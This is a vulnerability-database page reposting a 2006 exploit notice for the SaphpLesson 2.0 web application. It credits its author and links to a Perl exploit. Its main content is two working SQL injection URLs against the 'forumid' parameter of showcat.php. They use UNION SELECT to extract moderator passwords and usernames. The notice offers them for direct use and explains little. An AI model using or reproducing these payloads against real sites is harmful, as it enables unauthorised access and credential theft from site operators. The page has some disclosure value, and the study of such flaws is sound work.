Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12221
HistoryApr 14, 2006 - 12:00 a.m.

SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit

2006-04-1400:00:00
vulners.com
17

SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit

Discovered By SnIpEr_SA
Author : SnIpEr_SA
Exploit in Perl : http://www.milw0rm.com/exploits/download/1530
Remote : Yes
Local : No
Critical Level : Dangerous

Affected software description:

Indexu

Application : SaphpLesson
version     : 2.0
URL         : http://www.Arabless.com/
... 
------------------------------------------------------------------ 
Exploit:
~~~~~~~~ 
# For password # http://www.example.com/path/showcat.php?forumid=-1%20union%20select%20ModPassword%20from%20modretor #
 For username # http://www.example.com/path/showcat.php?forumid=-1%20union%20select%20ModName%20from%20modretor 
--------------------------------------------------------------------------- 
Contact:
 ~~~~~~~~
 SnIpEr_SA
E-mail: [email protected]
E-mail: SnIpEr_SA[at]Basdmail[dot]org
Homepage: http://www.3asfh.com/  & http://www.lezr.com/
Greetz: All My Frind
 -------------------------------- [ EOF ] ----------------------------------